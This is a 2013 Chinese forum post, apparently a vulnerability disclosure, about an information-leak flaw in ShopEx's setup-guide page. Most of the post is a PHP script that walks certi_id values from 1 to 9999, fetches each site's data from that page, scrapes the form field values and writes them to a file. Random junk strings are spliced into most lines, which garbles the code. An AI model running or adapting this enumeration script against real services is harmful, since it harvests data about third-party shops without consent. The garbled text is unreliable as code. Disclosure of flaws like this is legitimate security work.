|
|
简要描述:- R$ r' U( T9 p* n- W
ShopEx某接口缺陷,可遍历所有网站
% F0 k: M0 {+ t# o% q详细说明:
/ H8 }+ v! g9 U7 L" f( {问题出现在shopex 网店使用向导页面
) y( ~' B" o I9 m9 ^: [
. S- T) p1 i, R
2 ~6 x, i. o% {) W8 Q; Z5 r# P. Z& |8 j6 W# S$ |& @+ u6 v
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=9 k' ?' I4 y3 `
5 f* Z o' v. V* [9 t0 o6 K
# j8 d" C( F/ B1 _4 Y3 f8 u
, N) R* ~2 j7 f% b d; w7 brefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
1 O& @ l- c; q, l
- f) L4 c+ n5 h W$ m6 K! B( W& M% W3 x, r+ B4 l; R+ c4 j b# o# P
1 O- |' t# W1 J+ L$ Z我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 ! e+ T" r g& A5 T1 J& X8 S
0 N, d7 x3 j, w* l4 Y
7 ?* I5 \5 V3 O* z( Y- ] M7 A. b" m9 C
<?php/ Q0 I7 r7 w! M$ O. @5 e8 i
. z# [0 @ R2 z1 a! y- x for ($i=1; $i < 10000; $i++) { //遍历# @8 T, I/ N8 P9 a& S% w6 o
2 t+ G- p9 x+ P& }2 X7 f ShowshopExD($i);
: N3 G! x- j7 Y' J @& y" m, u% c: K: n- [5 X% S+ n ^. i& @
}0 }0 x8 j N9 i" M) P
7 \! v" l6 m, v- Y' K1 t function ShowshopExD($cid) {
7 O6 i- z* ~: @3 g1 W
: B6 S- `/ U" U0 c! ^$ `( ?! J5 c7 p $url='http://guide.ecos.shopex.cn/step2.php';) ?) J+ t3 S, \6 L* Y2 }- D
0 t0 b2 W6 H: D' r6 q $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');- O9 D$ D/ d' \. ^
) H9 S" q# g" y! J: E $url = $url.'?refer='.$refer;
2 u ]$ Z6 |4 C" @* @2 `) y3 }. ~
" Y9 O7 a# C% j6 k3 w+ V$ v3 @1 s2 p. c $ch = curl_init($url);( C" m, S, u9 ~' J
8 \; z. A9 d* j curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
, J7 o: v+ m% l2 M' y: O) D+ E
% _, N7 y! p8 H i' O curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;8 v2 x3 o% [" ]% b5 U6 L+ w$ m
+ C, i- ]; k/ F* f3 p7 l
$result = curl_exec($ch);
" L( d6 z0 r+ Y# ^* J1 |
. b9 l" C3 H d* f6 G" f" H $result = mb_convert_encoding($result, "gb2312", "UTF-8");1 W B1 {2 R5 T% w) |) G2 H2 c
) I9 ]1 K4 _0 W5 M- A if(strpos($result,$refer)); |- L' }, H; g5 P8 `/ D
C- ~9 c- c2 g4 ]/ y {
( g4 K/ x$ O4 z- T: { x/ ] K' S% ]
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
9 ?% \# \8 j1 y. c/ J
- A1 @+ f: n$ @6 I preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
5 J5 [3 W# w; u9 O; P/ [6 f3 t* C( [* x, P! W
foreach ($value[1] as $key) {1 W; m6 ]) a& F- N. E% s7 U
% y7 x. p, t1 n8 `# [3 R preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
# {! p/ j3 n1 x D) w. i3 |# a5 w# S/ n6 i" e, N% q# Y3 @# K% s
echo $res[1][0].':'.$res[3][0]."\r\n";$ Z9 O. g* C" z' ]
! D! a6 ^" z6 G+ f2 l $col =$res[1][0].':'.$res[3][0]."\r\n";
. Q* K0 V. C% X( j$ c, K& X' y1 z5 r' m$ ~
fwrite($fp, $col, strlen($col));
1 D! v' G- b# d" Z) s0 l: c# H2 F3 k; i0 X7 A
}- W1 l D V# ]: q, o2 Y% P
' {3 K; x( V& V* V1 p, r# o5 Y echo '--------------------------------'."\r\n";1 b: k) s& ]/ r1 F1 H1 _3 d
+ G2 n7 V/ c) G- N fclose($fp); 8 O$ ~* I6 O8 m& h
: Z# B. n* q" F: A- {8 _0 P2 _, o& O+ W. |
}6 F3 L9 E. Y5 ~- f+ F, e
& Z; [0 ~: @: W) a4 l( F; ^/ b9 f flush();
* U Z: q& B( v
* i& ]+ e4 v! I9 v6 H curl_close($ch);
2 v' D9 p: w0 O) _$ v$ E1 L0 _+ u' c1 x% n5 [- J
}- B+ N+ p9 l! p" H1 r2 q9 d8 s, J, q8 z
8 p/ Y2 w+ j1 K( `/ c
?>
. E) p9 T/ L: `+ b1 }6 r漏洞证明:
* n( d( D+ b. w- R% w9 khttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg; d1 y% o$ p1 K9 r3 F C$ r
refer换成其他加密方式" I: n9 w# ^7 q( Q2 V6 @$ ^
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对